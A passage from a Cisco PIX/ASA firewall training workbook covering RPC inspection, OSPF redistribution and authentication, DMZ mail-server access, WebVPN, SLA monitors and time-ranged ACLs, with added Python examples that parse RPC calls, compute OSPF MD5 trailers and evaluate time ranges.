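Note that the version lives in the outer, unencrypted envelope even for SNMPv3, so the decision never depends on decrypting anything; conversely, a packet that is not well-formed BER is dropped rather than passed, which is the safer default for an inspection engine.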


Cisco PIX Challenge 92


Outline
Sun RPC (Remote Procedure Call) is used mainly on UNIX-based systems to invoke services on
remote servers; NFS (file services) and NIS (domain and directory services) are both built on
it. A client first asks the portmapper (rpcbind) on port 111 (TCP or UDP) for the program
number of the service it wants, and the portmapper replies with the port that service is
listening on. With RPC inspection the firewall watches this exchange and checks the program
numbers and ports before allowing the follow-on connection.
Objectives
The objectives of this challenge are to:

Define interesting traffic (normally TCP port 111).
Define a policy map.
Define RPC inspection.
Apply the policy map.
Define a Sun RPC table.

Example
# config t
pixfirewall(config)# class-map ctest
pixfirewall(config-cmap)# match port tcp eq 111
pixfirewall(config-cmap)# exit
pixfirewall(config)# policy-map ptest
pixfirewall(config-pmap)# class ctest
pixfirewall(config-pmap-c)# inspect rpc
pixfirewall(config-pmap-c)# exit
pixfirewall(config-pmap)# exit
pixfirewall(config)# service-policy ptest global

The firewall can create an RPC services table to control Sun RPC traffic through the security
appliance with:
pixfirewall(config)# sunrpc ?
configure mode commands/options:
Current available interface(s):
Inf2     Name of interface Ethernet2
Inside   Name of interface Ethernet1
Outside  Name of interface Ethernet0
pixfirewall(config)# sunrpc inside ?
configure mode commands/options:
Hostname or A.B.C.D IP address of SUNRPC server
pixfirewall(config)# sunrpc inside 1.2.3.4 ?
configure mode commands/options:
A.B.C.D The network mask to be applied to IP address
pixfirewall(config)# sunrpc inside 1.2.3.4 255.255.255.0 ?
configure mode commands/options:
service Specify the SUNRPC service program number after this keyword
pixfirewall(config)# sunrpc inside 1.2.3.4 255.255.255.0 service ?
configure mode commands/options:
<0-2147483647> SUNRPC service program number
pixfirewall(config)# sunrpc inside 1.2.3.4 255.255.255.0 service 100004 ?
configure mode commands/options:
protocol SUNRPC transport protocol to be used
pixfirewall(config)# sunrpc inside 1.2.3.4 255.255.255.0 service 100004 p ?
configure mode commands/options:
tcp TCP to be used as transport protocol
udp UDP to be used as transport protocol
pixfirewall(config)# sunrpc inside 1.2.3.4 255.255.255.0 service 100004 p t ?
configure mode commands/options:
port Configure SUNRPC port range after this keyword
pixfirewall(config)# sunrpc inside 1.2.3.4 255.255.255.0 service 100004 p t p ?
configure mode commands/options:
highs            Keyword indicating port range 1024-65535
lows             Keyword indicating port range 1-1023
<start>[-<end>]  Enter a specific port (0-65535) or a range of ports
Named ports: aol, bgp, chargen, cifs, citrix-ica, cmd, ctiqbe, daytime, discard, domain,
echo, exec, finger, ftp, ftp-data, gopher, h323, hostname, http, https, ident, imap4, irc,
kerberos, klogin, kshell, ldap, ldaps, login, lotusnotes, lpd, netbios-ssn, nntp,
pcanywhere-data, pim-auto-rp, pop2, pop3, pptp, rsh, rtsp, sip, smtp, sqlnet, ssh, sunrpc,
tacacs, talk, telnet, uucp, whois, www
pixfirewall(config)# sunrpc inside 1.2.3.4 255.255.255.0 service 100004 protocol tcp port 111
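The decision the sunrpc table drives is made on the RPC call header and, for a portmapper lookup, on the program number the client asks for. The following is an added example for this page, not PIX/ASA code: a Python decoder for one RPC v2 call record as carried on TCP (RFC 5531 record marking, then xid, message type, program, version, procedure and the two opaque auth fields), which also pulls out the GETPORT arguments and matches them against a table shaped like the sunrpc command above. The table entry, the 1.2.3.4/24 server and the record bytes are constructed; the reading of 100004 as ypserv follows the standard RPC program registry.

```python
"""Decode a Sun RPC call (RFC 5531) carried on TCP and check a portmapper
GETPORT request against a sunrpc-style services table.  Added illustration,
not PIX/ASA code; the record, rule table and addresses are constructed."""
import ipaddress
import struct

PMAP_PROG, PMAP_VERS, PMAPPROC_GETPORT = 100000, 2, 3
IPPROTO = {6: "tcp", 17: "udp"}


def _u32(v):
    return struct.pack("!I", v)


def _skip_opaque_auth(buf, pos):
    """Skip an XDR opaque_auth: flavor, length, body padded to 4 bytes."""
    if pos + 8 > len(buf):
        raise ValueError("truncated auth field")
    _flavor, length = struct.unpack("!II", buf[pos:pos + 8])
    if length > 400:                       # RFC 5531 caps the opaque body at 400 bytes
        raise ValueError("oversized auth body")
    end = pos + 8 + ((length + 3) & ~3)
    if end > len(buf):
        raise ValueError("truncated auth body")
    return end


def parse_rpc_call(tcp_payload):
    """Parse one single-fragment RPC record; return the call header as a dict.

    For a portmapper GETPORT call the decoded arguments are added under
    'getport': that is the program/protocol an inspector must vet before it
    lets the client reach whatever port the portmapper answers with."""
    if len(tcp_payload) < 4:
        raise ValueError("no record marker")
    marker, = struct.unpack("!I", tcp_payload[:4])
    last, frag_len = bool(marker & 0x80000000), marker & 0x7FFFFFFF
    if not last or frag_len != len(tcp_payload) - 4:
        raise ValueError("multi-fragment or truncated record")
    rec = tcp_payload[4:]
    if len(rec) < 24:
        raise ValueError("short call header")
    xid, msg_type, rpcvers, prog, vers, proc = struct.unpack("!6I", rec[:24])
    if msg_type != 0 or rpcvers != 2:
        raise ValueError("not an RPC v2 CALL")
    pos = _skip_opaque_auth(rec, 24)       # credentials
    pos = _skip_opaque_auth(rec, pos)      # verifier
    call = {"xid": xid, "program": prog, "version": vers, "procedure": proc}
    if (prog, vers, proc) == (PMAP_PROG, PMAP_VERS, PMAPPROC_GETPORT):
        if pos + 16 > len(rec):
            raise ValueError("truncated GETPORT arguments")
        g_prog, g_vers, g_prot, g_port = struct.unpack("!4I", rec[pos:pos + 16])
        call["getport"] = {"program": g_prog, "version": g_vers,
                           "protocol": IPPROTO.get(g_prot, g_prot), "port": g_port}
    return call


def matches_sunrpc_table(rules, server_ip, program, protocol):
    """True if some entry (sunrpc <if> <server> <mask> service <n> protocol <p>)
    covers this server, program number and transport."""
    ip = ipaddress.ip_address(server_ip)
    for r in rules:
        net = ipaddress.ip_network(f"{r['server']}/{r['mask']}", strict=False)
        if ip in net and r["service"] == program and r["protocol"] == protocol:
            return True
    return False


# Constructed table mirroring the command configured above.
RULES = [{"interface": "inside", "server": "1.2.3.4", "mask": "255.255.255.0",
          "service": 100004, "protocol": "tcp", "port": (111, 111)}]

# Constructed client record: GETPORT for program 100004 (ypserv) over TCP.
_body = (_u32(0x1234ABCD) + _u32(0) + _u32(2)
         + _u32(PMAP_PROG) + _u32(PMAP_VERS) + _u32(PMAPPROC_GETPORT)
         + _u32(0) + _u32(0)               # credentials: AUTH_NONE, empty body
         + _u32(0) + _u32(0)               # verifier: AUTH_NONE, empty body
         + _u32(100004) + _u32(2) + _u32(6) + _u32(0))
SAMPLE_GETPORT = _u32(0x80000000 | len(_body)) + _body

if __name__ == "__main__":
    call = parse_rpc_call(SAMPLE_GETPORT)
    g = call["getport"]
    print(call, matches_sunrpc_table(RULES, "1.2.3.4", g["program"], g["protocol"]))
```

The record-marker check matters in practice: a client can split a call across fragments, and an inspector that only looks at the first fragment can be made to vet one program number while the server sees another.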


Cisco PIX Challenge 93


Outline
This challenge involves redistributing routes from one OSPF process into another, using a
route-map to select which routes cross and to set their metric and metric type.
Objectives
The objectives of this challenge are to:

Define a route-map.
Define redistribution.

Example
# config t
(config)# route-map ?
configure mode commands/options:
WORD < 58 char Route map tag
(config)# route-map rtest ?
configure mode commands/options:
<0-65535>  Sequence to insert to/delete from existing route-map entry
deny       Route map denies set operations
permit     Route map permits set operations
<cr>
(config)# route-map rtest permit
(config-route-map)# ?
Route Map configuration commands:
exit   Exit from route-map configuration mode
help   Interactive help for route-map subcommands
match  Match values from routing table
no     Negate a command
set    Set values in destination routing protocol
(config-route-map)# match ?
route-map mode commands/options:
interface   Match first hop interface of route
ip          Match IP address or next-hop or route-source
metric      Match metric of route
route-type  Match route-type of route
(config-route-map)# match metric ?
route-map mode commands/options:
<0-4294967295> Metric value
(config-route-map)# match metric 1
(config-route-map)# set ?
route-map mode commands/options:
metric       Set metric value for destination routing protocol
metric-type  Set type of metric for destination routing protocol
(config-route-map)# set metric-type ?
route-map mode commands/options:
type-1 OSPF external type 1 metric
type-2 OSPF external type 2 metric
(config-route-map)# set metric-type type-1
(config-route-map)# set metric ?
route-map mode commands/options:
<0-4294967295> Metric value
(config-route-map)# set metric 5
(config-route-map)# exit
(config)# router ospf 111
(config-router)# redistribute ?
router mode commands/options:
connected  Connected
ospf       Open Shortest Path First (OSPF)
static     Static routes
(config-router)# redistribute ospf 1 ?
router mode commands/options:
match        Redistribution of OSPF routes
metric       Metric for redistributed routes
metric-type  Set OSPF exterior metric type for redistributed routes
route-map    Route map reference
subnets      Consider subnets for redistribution into OSPF
tag          Set tag for routes redistributed into OSPF
<cr>
(config-router)# redistribute ospf 1 route-map ?
router mode commands/options:
WORD Pointer to route-map entries
(config-router)# redistribute ospf 1 route-map rtest ?
router mode commands/options:
match        Redistribution of OSPF routes
metric       Metric for redistributed routes
metric-type  Set OSPF exterior metric type for redistributed routes
subnets      Consider subnets for redistribution into OSPF
tag          Set tag for routes redistributed into OSPF
<cr>
(config-router)# redistribute ospf 1 route-map rtest

The route-map acts as a filter as well as a setter: only routes that match a permit entry
(here, routes with metric 1) are redistributed into process 111, and everything else hits the
implicit deny at the end of the map. The metric type matters for path selection in the
receiving process: with type-1 the internal cost to the redistributing router is added to the
external metric of 5, with type-2 the external metric is used as-is. Without the subnets
keyword only classful networks are considered, so it is normally added to the redistribute
command.

Cisco PIX Challenge 94


Outline
This challenge involves configuring OSPF routing
Objectives
The objectives of this challenge are to:

Define OSPF.
Define E1 OSPF parameters.

Example
(config)# router ospf 111
(config-router)# network 10.0.0.0 255.0.0.0 area 0
(config-router)# exit
(config)# int e1
(config-if)# ospf cost 20
(config-if)# ospf retransmit-interval 20
(config-if)# ospf transmit-delay 20
(config-if)# ospf priority 20
(config-if)# ospf hello-interval 20
(config-if)# ospf dead-interval 80
(config-if)# ospf authentication-key test
(config-if)# ospf message-digest-key 1 md5 test
(config-if)# ospf authentication message-digest

The hello and dead intervals must match on every router on the segment, and the dead
interval must be longer than the hello interval (the default is four times the hello
interval, hence 80 here); with the two set equal, the adjacency drops as soon as one hello
arrives late. Of the two authentication lines, only the MD5 key is used once ospf
authentication message-digest is set: the plain-text authentication-key travels in clear in
every OSPF packet and should not be relied on.
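What ospf message-digest-key actually puts on the wire is the cryptographic authentication trailer of RFC 2328 Appendix D.4.3: the key is appended to the packet, MD5 is taken over both, and the digest follows the packet. The following is an added example for this page, not firewall code: Python that builds a Hello with the interface values above (hello 20, dead 80, priority 20), signs it, and verifies it including the non-decreasing sequence number that guards against replay. Router ID,area ID, the options byte and the network mask in the sample are constructed values.

```python
"""Build and verify the OSPFv2 cryptographic-authentication trailer
(RFC 2328, Appendix D.4.3) as configured by "ospf message-digest-key 1 md5".
Added illustration, not firewall code; the Hello packet is constructed."""
import hashlib
import hmac
import struct

AUTYPE_CRYPTO = 2
HDR = "!BBH4s4sHHHBBI"   # ver, type, len, rid, aid, csum, autype, rsvd, keyid, authlen, seq


def build_hello(router_id, area_id, key_id, seq, hello=20, dead=80, priority=20):
    """Return an unsigned OSPF Hello with the crypto-auth header fields set.

    With AuType 2 the checksum is 0 and the Authentication field carries
    reserved(16) | key ID(8) | auth data length(8) | sequence number(32)."""
    body = struct.pack("!4sHBBI4s4s", b"\xff\xff\xff\x00", hello, 0x02, priority, dead,
                       b"\x00" * 4, b"\x00" * 4)       # mask, options (E), DR/BDR unknown
    length = 24 + len(body)
    header = struct.pack(HDR, 2, 1, length, router_id, area_id,
                         0, AUTYPE_CRYPTO, 0, key_id, 16, seq)
    return header + body


def _digest(packet, key):
    # The 16-byte key (zero padded, as the CLI does for shorter strings) is
    # appended to the packet and MD5 taken over both.
    return hashlib.md5(packet + key.ljust(16, b"\x00")[:16]).digest()


def md5_sign(packet, key):
    """Append the digest; it sits after the packet and is not counted in its length."""
    return packet + _digest(packet, key)


def md5_verify(wire, keys, last_seq=None):
    """Check the trailer of a received packet.

    keys maps key ID -> secret.  If last_seq is given the packet is also
    rejected when its sequence number goes backwards (replay protection)."""
    if len(wire) < 24:
        return False
    version, _ptype, length, _rid, _aid, csum, autype, _rsv, key_id, auth_len, seq = \
        struct.unpack(HDR, wire[:24])
    if version != 2 or autype != AUTYPE_CRYPTO or auth_len != 16 or csum != 0:
        return False
    if length + 16 != len(wire) or key_id not in keys:
        return False
    if last_seq is not None and seq < last_seq:
        return False
    expected = _digest(wire[:length], keys[key_id])
    return hmac.compare_digest(wire[length:], expected)


if __name__ == "__main__":
    pkt = build_hello(b"\x0a\x00\x00\x01", b"\x00\x00\x00\x00", key_id=1, seq=100)
    wire = md5_sign(pkt, b"test")
    print(len(wire), md5_verify(wire, {1: b"test"}), md5_verify(wire, {1: b"wrong"}))
```

Two things the code makes visible: the key ID in the header is what lets a router hold several keys at once and roll them without dropping adjacencies, and the sequence check is per neighbour, so a verifier keeps the last accepted value for each router ID rather than one global counter.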

Cisco PIX Challenge 95


Outline
This challenge involves configuring OSPF routing area details.
Objectives
The objectives of this challenge are to:

Define OSPF.
Define OSPF routing area details.
Define OSPF stub details.
Define route timers.
Define default route.
Define logging of neighbors.

Commands
(config)# router ospf 111
(config-router)# area 1 authentication
(config-router)# area 1 authentication message-digest
(config-router)# area 10 stub
(config-router)# area 10 default-cost 15
(config-router)# summary-address 1.2.3.0 255.255.0.0
(config-router)# area 10 range 2.3.4.0 255.255.0.0
(config-router)# default-information originate always
(config-router)# log-adj-changes detail
(config-router)# timers spf 10 10

Example
pixfirewall(config)# router ospf 111
pixfirewall(config-router)# ?
Router configuration commands:
area                 OSPF area parameters
compatible           OSPF compatibility list
default-information  Control distribution of default information
distance             Define an administrative distance
exit                 Exit from router configuration mode
help                 Interactive help for router subcommands
ignore               Do not complain about specific event
log-adj-changes      Log changes in adjacency state
neighbor             Specify a neighbor router
network              Add/remove interfaces to/from OSPF routing process
no                   Negate a command
redistribute         Redistribute information from another routing process
router-id            router-id for this OSPF process
summary-address      Configure IP address summaries
timers               Adjust routing timers

pixfirewall(config-router)# area ?
router mode commands/options:
<0-4294967295> OSPF area ID as a decimal value
A.B.C.D
OSPF area ID in IP address format
pixfirewall(config-router)# area 1 ?
router mode commands/options:
authentication Enable authentication
default-cost
Set the summary default-cost of a NSSA/stub area
filter-list
Filter networks between OSPF areas
nssa
Specify a NSSA area
range
Summarize routes matching address/mask (border routers only)
stub
Specify a stub area
virtual-link
Define a virtual link and its parameters
<cr>
pixfirewall(config-router)# area 1 authentication
pixfirewall(config-router)# area 1 authentication ?
router mode commands/options:
message-digest Use message-digest authentication
<cr>
pixfirewall(config-router)# area 1 authentication message-digest
pixfirewall(config-router)# area 10 stub
pixfirewall(config-router)# area 10 default-cost ?
router mode commands/options:
<0-65535> Stub's advertised external route metric
pixfirewall(config-router)# area 10 default-cost 15

Route summarization allows several routes to be advertised as a single address, which helps
to reduce the size of routing tables. The summary address should be the network address for
the mask given (1.2.0.0 with 255.255.0.0, for example); 1.2.3.0 with a /16 mask has host bits
set and is shown here only as typed in the challenge:
pixfirewall(config-router)# summary-address ?
router mode commands/options:
A.B.C.D IP summary address
pixfirewall(config-router)# summary-address 1.2.3.0 ?
router mode commands/options:
A.B.C.D Summary mask
pixfirewall(config-router)# summary-address 1.2.3.0 255.255.0.0

To summarize between OSPF areas:


pixfirewall(config-router)# area 10 range ?
router mode commands/options:
A.B.C.D IP address to match
pixfirewall(config-router)# area 10 range 2.3.4.0 ?
router mode commands/options:
A.B.C.D IP mask for address
pixfirewall(config-router)# area 10 range 2.3.4.0 255.255.0.0

To generate a default route:


pixfirewall(config-router)# default-information ?
router mode commands/options:
originate Distribute a default route
pixfirewall(config-router)# default-information originate ?
router mode commands/options:
always
Always advertise default route
metric
OSPF default metric
metric-type OSPF metric type for default routes
route-map
Route-map reference
<cr>
pixfirewall(config-router)# default-information originate always
pixfirewall(config-router)# log-adj-changes ?
router mode commands/options:
detail Log all state changes
<cr>
pixfirewall(config-router)# log-adj-changes detail

For OSPF timers:


pixfirewall(config-router)# timers ?
router mode commands/options:
lsa-group-pacing OSPF LSA group pacing timer
spf
OSPF SPF timers
pixfirewall(config-router)# timers spf ?
router mode commands/options:
<1-65535> Delay between receiving a change to SPF calculation
pixfirewall(config-router)# timers spf 10 ?
router mode commands/options:
<1-65535> Hold time between consecutive SPF calculations
pixfirewall(config-router)# timers spf 10 10


Cisco PIX Test


Outline
This challenge involves taking a PIX test.

Cisco PIX Challenge 97


Outline
This challenge involves configuring external access to an e-mail server on the DMZ.
Objectives
The objectives of this challenge are to:

Define fixup for SMTP.
Define access-lists to allow access to and from the e-mail server.
Define a static mapping between the e-mail server and an outside address.
Apply the access-lists.
Define MAC addresses for the ports (in case the burned-in addresses are also in use on other
devices).

Example
In the following example, the addresses of the ports are:
E0 (outside) 10.0.0.1
E1 (inside) 192.168.0.1
E2 (dmz) 172.16.10.1
The e-mail server is at 172.16.10.2 and will be mapped to 10.0.0.3 for external access.
The default gateway is at 10.0.0.2
(config)# fixup protocol smtp 25
(config)# int e0
(config-if)# ip address 10.0.0.1 255.255.255.0
(config-if)# nameif outside
(config-if)# mac-address 1111.2222.3333
(config-if)# no shutdown
(config-if)# exit
(config)# int e1
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# nameif inside
(config-if)# mac-address 2222.3333.4444
(config-if)# no shutdown
(config-if)# exit
(config)# int e2
(config-if)# ip address 172.16.10.1 255.255.255.0
(config-if)# nameif dmz
(config-if)# mac-address 3333.4444.5555
(config-if)# no shutdown
(config-if)# exit

Next permit access from the outside interface to the e-mail server's mapped address, on TCP
port 25 only:
(config)# access-list outside_interface permit tcp any host 10.0.0.3 eq smtp

Allow outgoing SMTP connections from the e-mail server to external nodes:
(config)# access-list dmz_interface permit tcp host 172.16.10.2 any eq smtp

Map the e-mail server on the DMZ, which is at 172.16.10.2, to the outside address 10.0.0.3:
(config)# static (dmz,outside) 10.0.0.3 172.16.10.2

Apply the access-lists:
(config)# access-group outside_interface in interface outside
(config)# access-group dmz_interface in interface dmz

Two points worth checking. fixup protocol smtp is the PIX 6.x form; 7.x accepts it and
converts it into inspect esmtp under the default policy-map, as in the SMTP inspection
challenge above. And once an access-group is applied on dmz, its implicit deny replaces the
default higher-to-lower permit, so the server can open nothing but outbound SMTP: add DNS
(UDP 53) to dmz_interface if the server resolves MX records itself.


14 ASA/New PIX

Cisco PIX Challenge 98


Outline
This challenge involves configuring WebVPN, which provides a secure remote-access VPN session
to the security appliance over SSL/TLS from a web browser, so no VPN client software or
hardware is needed on the remote host. It can be used for internal websites, web-enabled
applications, file shares, web e-mail, and so on. The challenge also configures an IP SLA
(Service Level Agreement) monitor, which is separate from WebVPN: it periodically probes a
remote IP address (here a static address) with ICMP echo so that its reachability can be
tracked.
Objectives
The objectives of this challenge are to:

Define the E0 name, IP address and subnet mask.
Define the WebVPN port.
Define WebVPN on the outside interface.
Define an SLA for a remote host on a certain interface.

Commands
(config)# int e0
(config-if)# nameif newjersey
(config-if)# ip address 1.2.3.5 255.255.0.0
(config-if)# no shutdown
(config-if)# exit
(config)# webvpn
(config-webvpn)# port 444
(config-webvpn)# enable newjersey
(config-webvpn)# exit
(config)# sla monitor 1
(config-sla-monitor)# type echo protocol ipIcmpEcho 1.2.3.4 interface newjersey
(config-sla-monitor-echo)# ?

Example
(config)# int e0
(config-if)# nameif newjersey
(config-if)# exit
(config)# webvpn
(config-webvpn)# ?
WebVPN commands:
apcf                         Load Application Profile Customization Framework (APCF) profile
authorization-dn-attributes  The DN of the peer certificate used as username for authorization
authorization-required       Require users to authorize successfully in order to connect
auto-signon                  Auto signon
cache                        Configure WebVPN cache
character-encoding           Configures the character encoding for WebVPN portal pages
csd                          This specifies whether Cisco Secure Desktop is enabled and the package file name to be used.
customization                Configure WebVPN GUI Customization object
default-idle-timeout         This is the default idle timeout in seconds
enable                       Enable WebVPN on the specified interface
exit                         Exit from WebVPN configuration mode
file-encoding                Configures the file encoding for a file sharing server
help                         Help for WebVPN commands
http-proxy                   This is the proxy server to use for HTTP requests
https-proxy                  This is the proxy server to use for HTTPS requests
java-trustpoint              Configure WebVPN java trustpoint
memory-size                  Configure WebVPN memory size
no                           Remove a WebVPN command or set to its default
port                         WebVPN should listen for connections on the specified port
port-forward                 Configure the port-forward list for WebVPN
proxy-bypass                 Configure proxy bypass
rewrite                      Configure content rewriting rule
sso-server                   Configure an SSO Server
svc                          This specifies whether the SSL VPN Client is enabled and the package file name to be used.
tunnel-group-list            Configure WebVPN group list dropdown in login page
url-list                     Configure a list of URLs for use with WebVPN
(config-webvpn)# port ?
webvpn mode commands/options:
<1-65535> The WebVPN server's SSL listening port. TCP port 443 is the default.
(config-webvpn)# port 444
(config-webvpn)# enable ?
webvpn mode commands/options:
inf2       Name of interface Ethernet2
inside     Name of interface Ethernet1
newjersey  Name of interface Ethernet0
(config-webvpn)# enable newjersey
(config-webvpn)# exit
(config)# sla ?
configure mode commands/options:
monitor IP Service Level Agreement Monitor
(config)# sla mon ?
configure mode commands/options:
<1-2147483647>  Entry Number
schedule        IP SLA Monitor Entry Scheduling
(config)# sla mon 1
(config-sla-monitor)# ?
IP SLA Monitor entry configuration commands:
exit  Exit operation configuration
type  Type of entry
(config-sla-monitor)# type ?
sla-monitor mode commands/options:
echo Echo Operation
(config-sla-monitor)# type echo ?
sla-monitor mode commands/options:
protocol Protocol to Use for Operations
(config-sla-monitor)# type echo protocol ?
sla-monitor mode commands/options:
ipIcmpEcho Use IP/ICMP
(config-sla-monitor)# t e p i ?
sla-monitor mode commands/options:
Hostname or A.B.C.D IP address or hostname
(config-sla-monitor)# t e p i 1.2.3.4 ?
sla-monitor mode commands/options:
interface Interface keyword
(config-sla-monitor)# t e p i 1.2.3.4 i ?
sla-monitor mode commands/options:
Current available interface(s):
inf2       Name of interface Ethernet2
inside     Name of interface Ethernet1
newjersey  Name of interface Ethernet0
(config-sla-monitor)# type echo protocol ipIcmpEcho 1.2.3.4 interface newjersey
(config-sla-monitor-echo)# ?
IP SLA Monitor Echo Configuration Commands:
default            Set a command to its defaults
exit               Exit probe configuration
frequency          Frequency of an operation
no                 Negate a command or set its defaults
num-packets        Number of Packets
request-data-size  Request data size
threshold          Operation threshold in milliseconds
timeout            Timeout of an operation
tos                Type Of Service
<cr>

Moving WebVPN off port 443 means remote users must put the port in the URL
(https://1.2.3.5:444/). The SLA entry defined here sends nothing until it is started with sla
monitor schedule, and it only becomes useful for failover once a track object and a static
route are tied to it.

Cisco ASA/PIX Challenge 99


Outline
The ASA device supports a time-range for ACLs, such as defining an access-list for a
weekend, or for specific day. It also includes two configuration elements for AAA settings
(not linked to time-ranges).
Note: ASA/PIX 7.x only
Objectives
The objectives of this challenge are to:

Define a time-range.
Implement a time-ranged ACL.
Define an AAA group tag.
Define an AAA host.
Define AAA host details.

Commands
(config)# int e0
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# nameif newyork
(config-if)# exit
(config)# time-range workingday
(config-time-range)# periodic weekdays 5:00 to 9:00
(config-time-range)# periodic saturday 3:00 to 15:00
(config-time-range)# exit
(config)# access-list Columbia permit ip any any time-range workingday
(config)# aaa-server test protocol radius
(config-aaa-server-group)# exit
(config)# aaa-server test (newyork) host 1.2.3.4
(config-aaa-server-host)# key testkey
(config-aaa-server-host)# authentication-port 1645
(config-aaa-server-host)# accounting-port 1646
(config-aaa-server-host)# retry-interval 10
(config-aaa-server-host)# exit

Example
(config)# int e0
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# nameif newyork
(config-if)# exit
(config)# time-range workingday
(config-time-range)# ?
Time range configuration commands:
absolute  absolute time and date
exit      Exit from time-range configuration mode
help      Help for time-range configuration commands
no        Negate a command or set its defaults
periodic  periodic time and date
(config-time-range)# ab ?
trange mode commands/options:
end    ending time and date
start  starting time and date
(config-time-range)# periodic ?
trange mode commands/options:
Friday     Friday
Monday     Monday
Saturday   Saturday
Sunday     Sunday
Thursday   Thursday
Tuesday    Tuesday
Wednesday  Wednesday
daily      Every day of the week
weekdays   Monday thru Friday
weekend    Saturday and Sunday
(config-time-range)# periodic weekdays ?
trange mode commands/options:
hh:mm Starting time
(config-time-range)# periodic weekdays 5:00 ?
trange mode commands/options:
to ending day and time
(config-time-range)# periodic weekdays 5:00 to ?
trange mode commands/options:
hh:mm Ending time - stays valid until beginning of next minute
(config-time-range)# periodic weekdays 5:00 to 9:00
(config-time-range)# exit
(config)# access-list Columbia permit ip any any time-range workingday

Time-ranges are evaluated against the appliance's own clock, so set the clock (or NTP) and
the time zone before relying on one; a wrong clock silently opens or closes the ACE.
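To see exactly when the time-ranged ACE above is active, the following is an added example for this page, not ASA/PIX code: a Python evaluator that parses periodic statements in the syntax the CLI help shows (day keywords, hh:mm, an optional ending day) and tests a timestamp against them. The inclusive end minute implements the help text's "stays valid until beginning of next minute"; the rejection of an end time earlier than the start on the same day, and the rule that an explicit ending day needs exactly one starting day, are assumptions of the example.

```python
"""Evaluate periodic time-range statements against a timestamp.  Added
illustration, not ASA/PIX code.  Minute-of-week arithmetic (Monday 00:00 is
minute 0) handles both same-day and spanning statements uniformly."""
from datetime import datetime

DAYS = ["monday", "tuesday", "wednesday", "thursday", "friday", "saturday", "sunday"]
GROUPS = {"daily": set(range(7)), "weekdays": set(range(5)), "weekday": set(range(5)),
          "weekend": {5, 6}}
WEEK = 7 * 1440


def _hhmm(text):
    h, m = text.split(":")
    h, m = int(h), int(m)
    if not (0 <= h < 24 and 0 <= m < 60):
        raise ValueError(f"bad time {text!r}")
    return h * 60 + m


def parse_periodic(stmt):
    """'periodic <days> hh:mm to [<day>] hh:mm' -> list of (start, end)
    minute-of-week intervals, inclusive at both ends."""
    w = stmt.strip().lower().split()
    if len(w) < 5 or w[0] != "periodic" or "to" not in w:
        raise ValueError(f"not a periodic statement: {stmt!r}")
    i = w.index("to")
    day_words, start, tail = w[1:i - 1], _hhmm(w[i - 1]), w[i + 1:]
    days = set()
    for d in day_words:
        if d in GROUPS:
            days |= GROUPS[d]
        elif d in DAYS:
            days.add(DAYS.index(d))
        else:
            raise ValueError(f"unknown day {d!r}")
    if not days:
        raise ValueError("no start day given")
    if len(tail) == 2:                             # explicit ending day (assumed: one start day)
        if len(days) != 1 or tail[0] not in DAYS:
            raise ValueError("an ending day needs exactly one starting day")
        a = next(iter(days)) * 1440 + start
        b = DAYS.index(tail[0]) * 1440 + _hhmm(tail[1])
        return [(a, b if b >= a else b + WEEK)]      # may wrap past Sunday night
    if len(tail) != 1:
        raise ValueError("expected 'to hh:mm'")
    end = _hhmm(tail[0])
    if end < start:
        raise ValueError("end time before start time on the same day")
    return [(d * 1440 + start, d * 1440 + end) for d in sorted(days)]


def time_range_active(statements, when):
    """True if any periodic statement covers `when` (a datetime).  Seconds are
    ignored, so an end of 9:00 still matches 09:00:59 and fails at 09:01."""
    m = when.weekday() * 1440 + when.hour * 60 + when.minute
    for stmt in statements:
        for a, b in parse_periodic(stmt):
            if a <= m <= b or a <= m + WEEK <= b:    # second test covers wrapped intervals
                return True
    return False


# The time-range from the example above.
WORKINGDAY = ["periodic weekdays 5:00 to 9:00", "periodic saturday 3:00 to 15:00"]

if __name__ == "__main__":
    for ts in (datetime(2024, 5, 6, 7, 30), datetime(2024, 5, 6, 9, 0, 59),
               datetime(2024, 5, 6, 9, 1), datetime(2024, 5, 11, 14, 59),
               datetime(2024, 5, 12, 7, 0)):
        print(ts.strftime("%a %H:%M:%S"), time_range_active(WORKINGDAY, ts))
```

Feeding the evaluator the timestamps of a few log lines is a quick way to confirm, before an ACL goes live, that a range such as "friday 22:00 to monday 6:00" really covers the whole weekend and not just Friday evening.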

Next the AAA server is defined:
pixfirewall(config)# aaa-server ?
configure mode commands/options:
WORD < 17 char Enter a AAA server group tag
pixfirewall(config)# aaa-server test ?
configure mode commands/options:
(                    Open parenthesis for the name of the network interface where the designated AAA server is accessed
deadtime             Specify the amount of time that will elapse between the disabling of the last server in the group and the subsequent re-enabling of all servers
host                 Enter this keyword to specify the IP address for the server
max-failed-attempts  Specify the maximum number of failures that will be allowed for any server in the group before that server is deactivated
protocol             Enter the protocol for a AAA server group
pixfirewall(config)# aaa-s test protocol ?
configure mode commands/options:
kerberos  Protocol Kerberos
ldap      Protocol LDAP
nt        Protocol NT
radius    Protocol RADIUS
sdi       Protocol SDI
tacacs+   Protocol TACACS+
(config)# aaa-server test protocol radius
(config-aaa-server-group)# ?
AAA server configuration commands:
accounting-mode      Enter this keyword to specify accounting mode
exit                 Exit from aaa-server group configuration mode
help                 Help for AAA server configuration commands
max-failed-attempts  Specify the maximum number of failures that will be allowed for any server in the group before that server is deactivated
no                   Remove an item from aaa-server group configuration
reactivation-mode    Specify the method by which failed servers are reactivated
(config-aaa-server-group)# accounting-mode ?
aaa-server-group mode commands/options:
simultaneous  Enter this keyword to specify simultaneous accounting
single        Enter this keyword to specify single accounting
(config-aaa-server-group)# max-failed-attempts ?
aaa-server-group mode commands/options:
<1-5> Maximum number of failures (1-5)
(config-aaa-server-group)# reactivation-mode ?
aaa-server-group mode commands/options:
depletion  Failed servers will remain inactive until all other servers in this group are inactive
timed      Failed servers will be reactivated after 30 seconds of down time
(config-aaa-server-group)# exit
(config)# aaa-server test (newyork) ?
configure mode commands/options:
host Enter this keyword to specify the IP address for the server
(config)# aaa-server test (newyork) h ?
configure mode commands/options:
Hostname or A.B.C.D  Enter an IP address or a name
WORD < 129 char      Enter a DNS name
(config)# aaa-server test (newyork) h 1.2.3.4 ?
configure mode commands/options:
WORD     Alphanumeric keyword up to 128 characters used as the encryption key for communicating with the AAA server.
timeout  Specify the maximum time to wait for response from configured server
<cr>
(config)# aaa-server test (newyork) host 1.2.3.4
(config-aaa-server-host)# ?
AAA server configuration commands:
accounting-port      Specify the port number to be used for accounting
acl-netmask-convert  Specify the ACL Downloadable Netmask Operation
authentication-port  Specify the port number to be used for authentication
